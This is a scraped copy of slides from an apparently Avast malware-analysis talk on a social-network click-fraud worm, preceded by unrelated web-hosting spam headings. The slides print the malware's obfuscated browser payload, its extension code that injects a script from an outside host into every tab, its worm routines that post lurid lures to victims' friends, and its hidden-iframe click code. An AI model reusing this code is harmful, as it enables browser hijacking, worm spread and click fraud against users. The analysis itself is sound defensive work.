Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 

Every Click Counts (But All the Money Goes to Me)

  • 2. Every Click Counts (But All the Money Goes to Me) Lukáš Hasík Jan Širmer
  • 3. Agenda • Simple way to steal credentials • Click for me • Executable clicker • Data from AVAST CommunityIQ userbase • Summary • Questions
  • 4. Simple way to steal credentials
  • 5. Simple way to steal credentials credentials
  • 6. Simple way to steal credentials
  • 7. Simple way to steal credentials User feels confident – s/he received a confirmation
  • 8. Simple way to steal credentials And some users really provided they real credentials…
  • 16. Payloads for FF and Chrome eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){ whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1}; while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p} ('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ; 2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25|| 2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25|| 2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")=="") {2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65)) {2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71''80&68'24&76`74}5", 17,8)}},64:9(){36 10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="") {2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101; 102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26) {63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28 103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15) {34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26) {15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)| 0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15) {39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));
  • 18. Change setting in browser TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9 TestAddon.ch default string TestAddon.date user set string 1340624313 TestAddon.guid user set string 3c94f90903f031a799162872a55742e8 TestAddon.int user set string 60 TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5
  • 19. j.php content function updated(tabId, changeInfo, tab){ if(changeInfo.status == 'complete'){ chrome.tabs.executeScript(tabId, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.sr c='http://uhnm6.me/EDITED.php? v=0.05a';h.appendChild(s);}"}, null); } } chrome.tabs.onUpdated.addListener(updated); chrome.tabs.getAllInWindow(null,function(tabs){ for(var i=0;i < tabs.length;i++){ chrome.tabs.executeScript(tabs[i].id, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.sr c='http://uhnm76.me/EDITED.php? v=0.05a';h.appendChild(s);}"}, null); } });
  • 20. js_f.php • Two different ways 1. Spreading malware to other people and works as a clicker 2. Only clicker
  • 21. Spreading malware • Script updates the victim’s Facebook and twitter status by posting new status messages
  • 22. Spreading malware var videos = new Array(10); videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772"); var flk = Array(); if ((1 == 1)) { var randomnumber = Math.floor(Math.random() * 100); if (randomnumber > 0) {
  • 23. Spreading malware var uri = "http://tol.co/5q"; if ((document.location.href.search("tagged.com") > -1)) { var ids = get_friends_t(1); if (ids.length > 0) { for (var i in ids) { send_msg(uri, ids[i], "2222") } } else { post_item("LOL Miley Cyrus got caught having s3x " + uri, "2222") } }
  • 24. Functionality function likepage(pageid) { var likepost = "fbpage_id=" + pageid + "&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet _header&post_form_id=" + fid + "&fb_dtsg=" + fbdt + "&lsd&post_form_id_source=AsyncRequest"; var likepage = new XMLHttpRequest(); likepage.open("POST", "/ajax/pages/fan_status.php? __a=1"); likepage.send(likepost) }
  • 25. Functionality function get_online_friends(limit) { var friends = get_friends(limit); var friends = make_array(friends); friends.sort(); var postfields = "user=" + uid; for (var i = 0; i < friends.length; i++) { postfields += "&available_user_info_ids[" + i + "]=" + friends[i] }
  • 26. Functionality function get_solved_captcha(extra_challenge_params, opt) { var output = new Array(3); var post = new XMLHttpRequest(); post.open("GET", "http://mp56a.com/fn/cs/api/s_c.php?u=" + escape(extra_challenge_params), false); post.send(); if (post.readyState == 4 && post.status == 200) { data = eval('(' + post.responseText + ')'); console.log(data); post[1] = data.key; post[2] = data.challenge }
  • 27. Create injected iframe function createIframe(src) { var ifr = document.createElement("iframe"); ifr.setAttribute("src", src); ifr.style.position = "absolute"; ifr.style.top = "0"; ifr.style.left = "0"; ifr.style.width = "100%"; ifr.style.height = "100%"; document.body.appendChild(ifr) } function get_img_src(src, no) { x = src.getElementsByTagName("img"); return x[no].id } function make_dom(src) { var tempDiv = document.createElement("div"); tempDiv.innerHTML = src; return tempDiv }
  • 28. Clicker • BHO, Firefox and Chrome payloads contain link to site like http://resultsz.com/search/anticheat6.php?username=foreste • There is hosted list of sites used by all of those “clickers” for injecting hidden iframe with every visited site and earning money to the blackhat.
  • 29. Summary • Be aware of social engineering – Even simple attempts can be successful • Social networks are used for spreading malware – More user == more efficiency • Trendy topics, celebrities and latest news are often start point for these infection vectors
  • 31. Thank you Jan Sirmer ([email protected]) Senior Virus Analyst Lukas Hasik ([email protected]) QA Director

Editor's Notes

  • #3: predstaveni
  • #11: 1)User click on Kirsten’s video 2)There is a malware 3)Malware secretly inject user’s PC 4)Malware communicate with C&amp;C where receive a list of sites where to click 5)Malware clicks on received sites 6)Bad guy receive money
  • #16: Inside jstest.js are many links to different sites that are visited by user’s browser and the attacker gains money from clicks.